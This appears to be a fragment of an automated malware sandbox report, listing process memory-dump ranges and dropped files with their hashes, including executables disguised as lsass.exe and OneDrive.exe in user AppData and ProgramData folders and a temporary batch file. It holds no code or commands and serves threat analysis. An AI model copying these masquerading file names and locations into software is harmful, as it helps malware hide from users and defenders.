memory/952-237-0x000000000B150000-0x000000000B1E2000-memory.dmp

memory/952-238-0x000000000BE80000-0x000000000C424000-memory.dmp

memory/4668-239-0x0000000005E70000-0x0000000005E80000-memory.dmp

memory/4600-240-0x0000000004910000-0x0000000004911000-memory.dmp

memory/952-241-0x000000000BD80000-0x000000000BDD0000-memory.dmp

memory/4600-242-0x0000000004900000-0x0000000004901000-memory.dmp

memory/4600-244-0x00000000048E0000-0x00000000048E1000-memory.dmp

memory/4600-243-0x00000000048F0000-0x00000000048F1000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/3364-248-0x00007FF76FA30000-0x00007FF7703FA000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/2600-260-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/2600-261-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/2600-262-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/952-263-0x000000000C700000-0x000000000C8C2000-memory.dmp

memory/952-264-0x000000000CE00000-0x000000000D32C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8b5d3a2c2b26ac36b88cf03dd0a32fa9
SHA1 a9122eb088176912311fc0f8eb0b8f020693d259
SHA256 8a11a416df1c3ef93ee65773a43d84cdec960e9d551fcb0a4351fc15f1d0ff52
SHA512 47e0f4eddc7e7323988597ac5fcf7c7ea15a9999667e07d6cc422fb072a5d2e0c5501a11db8b4f5e8a0f380a85ef0a60f9a201ed30f80b104b825bfe8d60a7c6

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/2600-281-0x0000000000910000-0x0000000000D30000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

C:\Users\Admin\AppData\Local\Temp\tmpFEE7.tmp.bat

MD5 94363fa2517b2b4729c45ff4c4d2aeb4
SHA1 ecc777c8aebb5c55ea70b5dce085b1719348c1b6
SHA256 0bd388cb05ce5ea7a4d2f70d1a132bea1929bed734c993fecb50a7e60988ddcf
SHA512 67e2c922ae49a6b7c6a1201e0e16393b1cecc66545f8595847bfd26ad81dca173a66b91cc4906688238eb6bf10870d703686275e1fa37ff9d804a0831df6e1b8

memory/4656-284-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4656-285-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4656-286-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4212-288-0x0000022873590000-0x00000228735A0000-memory.dmp

memory/4212-287-0x0000022873590000-0x00000228735A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8b5d3a2c2b26ac36b88cf03dd0a32fa9
SHA1 a9122eb088176912311fc0f8eb0b8f020693d259
SHA256 8a11a416df1c3ef93ee65773a43d84cdec960e9d551fcb0a4351fc15f1d0ff52
SHA512 47e0f4eddc7e7323988597ac5fcf7c7ea15a9999667e07d6cc422fb072a5d2e0c5501a11db8b4f5e8a0f380a85ef0a60f9a201ed30f80b104b825bfe8d60a7c6

memory/4212-299-0x0000022873590000-0x00000228735A0000-memory.dmp

memory/4600-303-0x0000000000400000-0x000000000083B000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/5068-307-0x000001D1774D0000-0x000001D1774F0000-memory.dmp

memory/2140-308-0x00007FF64EFE0000-0x00007FF64F9AA000-memory.dmp

memory/4656-309-0x0000000003CF0000-0x0000000003CFA000-memory.dmp

memory/5068-311-0x000001D178E80000-0x000001D178EC0000-memory.dmp

memory/4600-310-0x0000000000400000-0x000000000083B000-memory.dmp

memory/4656-312-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-313-0x0000000000400000-0x000000000083B000-memory.dmp

memory/4052-314-0x00007FF73A5F0000-0x00007FF73A619000-memory.dmp

memory/5068-315-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-316-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-317-0x0000000000400000-0x000000000083B000-memory.dmp

memory/4052-318-0x00007FF73A5F0000-0x00007FF73A619000-memory.dmp

memory/5068-319-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-320-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-321-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-323-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/5068-324-0x000001D178F00000-0x000001D178F20000-memory.dmp

memory/4656-325-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-326-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-328-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-329-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/5068-330-0x000001D178F00000-0x000001D178F20000-memory.dmp

memory/4600-331-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-333-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-334-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-335-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-337-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-338-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-339-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-341-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-342-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-343-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-345-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-346-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-347-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-349-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-350-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-351-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-353-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-354-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-355-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-357-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp

memory/4656-358-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/4600-359-0x0000000000400000-0x000000000083B000-memory.dmp

memory/5068-361-0x00007FF7D8F90000-0x00007FF7D977F000-memory.dmp